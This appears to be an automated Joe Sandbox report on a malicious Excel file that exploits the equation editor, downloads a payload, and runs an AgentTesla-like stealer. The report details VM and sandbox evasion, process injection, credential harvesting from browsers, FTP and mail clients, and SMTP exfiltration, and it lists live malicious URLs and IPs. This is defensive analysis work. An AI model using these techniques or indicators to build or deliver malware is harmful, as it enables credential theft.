              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: TACSAL.xlsxStream path 'EncryptedPackage' entropy: 7.9999208389 (max. 8.0)

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2159922481.00000000023C1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2736, type: MEMORY
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9649
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2300Thread sleep time: -300000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2712Thread sleep time: -51785s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2892Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2956Thread sleep time: -300000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2960Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2960Thread sleep time: -120000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 3012Thread sleep count: 82 > 30
              Source: C:\Users\Public\vbc.exe TID: 3012Thread sleep count: 9649 > 30
              Source: C:\Users\Public\vbc.exe TID: 2960Thread sleep count: 107 > 30
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
              Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
              Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: vbc.exe, 00000005.00000002.2371071376.0000000000EC0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: vbc.exe, 00000005.00000002.2371071376.0000000000EC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: vbc.exe, 00000005.00000002.2371071376.0000000000EC0000.00000002.00000001.sdmpBinary or memory string: !Progman
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2836, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2736, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: Yara matchFile source: 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2836, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2836, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2736, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information31Security Account ManagerSecurity Software Discovery211SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing2NTDSVirtualization/Sandbox Evasion13Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol132Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 344848 Sample: TACSAL.xlsx Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->35 37 Multi AV Scanner detection for domain / URL 2->37 39 Found malware configuration 2->39 41 17 other signatures 2->41 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 37 17 2->12         started        process3 dnsIp4 33 suresb1sndyintercont.dns.army 103.153.76.181, 49165, 80 TWIDC-AS-APTWIDCLimitedHK unknown 7->33 21 C:\Users\user\AppData\Local\...\winlog[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 51 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->51 14 vbc.exe 7->14         started        25 C:\Users\user\Desktop\~$TACSAL.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->53 55 Machine Learning detection for dropped file 14->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->57 59 Injects a PE file into a foreign processes 14->59 17 vbc.exe 10 14->17         started        process9 dnsIp10 27 208.91.198.143, 49167, 587 PUBLIC-DOMAIN-REGISTRYUS United States 17->27 29 smtp.migeulez.com 17->29 31 us2.smtp.mailhostbox.com 208.91.199.225, 49166, 587 PUBLIC-DOMAIN-REGISTRYUS United States 17->31 43 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->43 45 Tries to steal Mail credentials (via file access) 17->45 47 Tries to harvest and steal ftp login credentials 17->47 49 Tries to harvest and steal browser information (history, passwords, etc) 17->49 signatures11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              TACSAL.xlsx32%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\vbc.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe100%Joe Sandbox ML

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              5.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

              Domains

              SourceDetectionScannerLabelLink
              suresb1sndyintercont.dns.army4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              http://suresb1sndyintercont.dns.army/receipst/winlog.exe11%VirustotalBrowse
              http://suresb1sndyintercont.dns.army/receipst/winlog.exe100%Avira URL Cloudmalware
              http://smtp.migeulez.com0%Avira URL Cloudsafe
              http://GhlhtO.com0%Avira URL Cloudsafe
              https://FTlR0ss5usK.net0%Avira URL Cloudsafe
              https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
              https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
              https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              https://api.ipify.org%0%URL Reputationsafe
              https://api.ipify.org%0%URL Reputationsafe
              https://api.ipify.org%0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              us2.smtp.mailhostbox.com
              208.91.199.225
              truefalse
                high
                suresb1sndyintercont.dns.army
                103.153.76.181
                truetrueunknown
                smtp.migeulez.com
                unknown
                unknowntrue
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://suresb1sndyintercont.dns.army/receipst/winlog.exetrue
                  • 11%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  https://FTlR0ss5usK.nettrue
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://127.0.0.1:HTTP/1.1vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://DynDns.comDynDNSvbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2372183882.0000000005DF0000.00000002.00000001.sdmpfalse
                    high
                    http://us2.smtp.mailhostbox.comvbc.exe, 00000005.00000002.2371340918.00000000026D6000.00000004.00000001.sdmpfalse
                      high
                      http://www.day.com/dam/1.0E243FB15.emf.0.drfalse
                        high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://smtp.migeulez.comvbc.exe, 00000005.00000002.2371340918.00000000026D6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://GhlhtO.comvbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.ipify.org%GETMozilla/5.0vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        http://www.%s.comPAvbc.exe, 00000005.00000002.2372183882.0000000005DF0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2159922481.00000000023C1000.00000004.00000001.sdmpfalse
                          high
                          https://api.ipify.org%vbc.exe, 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          low
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          208.91.198.143
                          unknownUnited States
                          394695PUBLIC-DOMAIN-REGISTRYUStrue
                          208.91.199.225
                          unknownUnited States
                          394695PUBLIC-DOMAIN-REGISTRYUSfalse
                          103.153.76.181
                          unknownunknown
                          134687TWIDC-AS-APTWIDCLimitedHKtrue

                          General Information

                          Joe Sandbox Version:31.0.0 Emerald
                          Analysis ID:344848
                          Start date:27.01.2021
                          Start time:09:14:23
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 7m 52s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:TACSAL.xlsx
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winXLSX@6/8@8/3
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 0.2% (good quality ratio 0.2%)
                          • Quality average: 58.3%
                          • Quality standard deviation: 15.1%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xlsx
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • TCP Packets have been reduced to 100
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          09:15:09API Interceptor80x Sleep call for process: EQNEDT32.EXE modified
                          09:15:13API Interceptor949x Sleep call for process: vbc.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          208.91.198.143para.exeGet hashmaliciousBrowse
                            SIC_9827906277.pdf.exeGet hashmaliciousBrowse
                              HTMY-209871640.exeGet hashmaliciousBrowse
                                Payment slip.exeGet hashmaliciousBrowse
                                  2Dd20YdQDR.exeGet hashmaliciousBrowse
                                    SPpfYOx5Ju.exeGet hashmaliciousBrowse
                                      Z1cfHQnsLw.exeGet hashmaliciousBrowse
                                        SecuriteInfo.com.Trojan.Packed2.42809.32039.exeGet hashmaliciousBrowse
                                          MTC74989-1-19-21.exeGet hashmaliciousBrowse
                                            IQzEWkxzNM.exeGet hashmaliciousBrowse
                                              72-XV-032_Valves.exeGet hashmaliciousBrowse
                                                sample2.exeGet hashmaliciousBrowse
                                                  invoice No 8882.exeGet hashmaliciousBrowse
                                                    DHL Delivery Confirmation.exeGet hashmaliciousBrowse
                                                      Verify Email.exeGet hashmaliciousBrowse
                                                        Statement of Account.docGet hashmaliciousBrowse
                                                          vsl particulars.exeGet hashmaliciousBrowse
                                                            DHL Shipment Documents.exeGet hashmaliciousBrowse
                                                              suk1MHq6DK.exeGet hashmaliciousBrowse
                                                                Swift_advise.xlsxGet hashmaliciousBrowse
                                                                  208.91.199.225para.exeGet hashmaliciousBrowse
                                                                    Quotation Prices.exeGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Trojan.PackedNET.519.20020.exeGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Artemis707F61F6A223.exeGet hashmaliciousBrowse
                                                                          SOA.exeGet hashmaliciousBrowse
                                                                            SPpfYOx5Ju.exeGet hashmaliciousBrowse
                                                                              ezs8BPdIwM.exeGet hashmaliciousBrowse
                                                                                Order confirmation.xlsxGet hashmaliciousBrowse
                                                                                  Groupo Dani Order_pdf.exeGet hashmaliciousBrowse
                                                                                    Purchased Order.exeGet hashmaliciousBrowse
                                                                                      NvS9UwcK3c.exeGet hashmaliciousBrowse
                                                                                        Outstanding Invoices.exeGet hashmaliciousBrowse
                                                                                          UAE CHEMEX RFQ.exeGet hashmaliciousBrowse
                                                                                            Invoice.exeGet hashmaliciousBrowse
                                                                                              AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                                                MV. Double Miracle.exeGet hashmaliciousBrowse
                                                                                                  AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                                                    Shipping document.exeGet hashmaliciousBrowse
                                                                                                      FB-108N & FB-108NK #U8a62#U50f9 - #U7530#U52e4.exeGet hashmaliciousBrowse
                                                                                                        Ldz62seIo3.exeGet hashmaliciousBrowse
                                                                                                          103.153.76.181PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                                          • suresb1sndyintercont.dns.army/receipst/winlog.exe

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          us2.smtp.mailhostbox.comPO#21010028 - SYINDAC QT-00820_pdf.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.223
                                                                                                          para.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          AWB 9899691012 TRACKING INFO_pdf.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          para.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          SIC_9827906277.pdf.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.198.143
                                                                                                          Quotation Prices.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          SecuriteInfo.com.Trojan.PackedNET.519.20020.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          SSE_SOA2021.docGet hashmaliciousBrowse
                                                                                                          • 208.91.198.143
                                                                                                          HTG-9066543.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.223
                                                                                                          New Order #21076.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          HTMY-209871640.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.198.143
